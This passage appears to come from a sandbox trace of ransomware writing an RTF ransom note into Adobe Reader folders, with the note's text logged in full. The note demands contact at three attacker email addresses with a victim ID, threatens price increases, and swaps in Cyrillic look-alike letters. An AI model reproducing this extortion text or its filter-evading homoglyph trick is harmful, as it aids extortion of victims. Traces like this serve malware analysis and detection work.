lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.550] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.551] CloseHandle (hObject=0x1fc) returned 1 [0064.552] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\bg85_info.rtf")) returned 0xffffffff [0064.552] GetLastError () returned 0x2 [0064.552] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.552] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.552] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 